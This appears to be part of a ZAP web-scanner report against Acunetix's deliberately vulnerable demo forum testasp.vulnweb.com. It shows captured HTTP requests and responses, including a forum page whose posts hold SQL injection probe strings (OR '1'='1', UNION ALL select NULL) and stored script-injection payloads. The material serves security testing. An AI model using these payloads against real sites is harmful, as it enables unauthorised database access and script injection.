Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 505 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 13536 |
| Response Body - size: 13,536 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd 